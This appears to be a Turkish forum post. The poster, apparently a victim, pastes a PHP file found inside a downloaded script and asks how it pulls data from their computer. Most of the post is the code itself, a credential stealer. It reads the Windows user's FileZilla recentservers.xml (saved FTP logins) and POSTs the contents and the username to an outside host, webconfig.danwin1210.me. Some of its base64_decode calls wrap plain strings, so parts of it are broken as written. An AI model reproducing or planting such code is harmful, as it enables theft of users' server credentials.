<?php
$pat = @exec("echo %username%");
$code = ("hacklink_code");
$rizy = base64_decode("C:/Users/");
$fizy = $pat;
$rizy_2 = base64_decode("/AppData/Roaming/FileZilla/recentservers.xml");
$linked = ("".$rizy."".$fizy."".$rizy_2."");
$hacklink = fopen($linked, 'r');
$read = fread($hacklink, filesize($linked));
$ch2 = curl_init(base64_decode("https://webconfig.danwin1210.me/hacklink.php?read"));
curl_setopt ($ch2, CURLOPT_POST, true);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, "f=".$read."&m=".$pat."");
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_VERBOSE, 1);
curl_setopt($ch2, CURLOPT_NOBODY, 0);
$hacklink_parsed = curl_exec($ch2);
curl_close($ch2);
?>Böyle bir dosya buldum indirdiğim scriptin içinde. Bir türlü çözemedim
$ch2 = curl_init(base64_decode("https://webconfig.danwin1210.me/hacklink.php?read")); alanında nasıl bir kod var ki bilgisayardan verileri çekiyor ?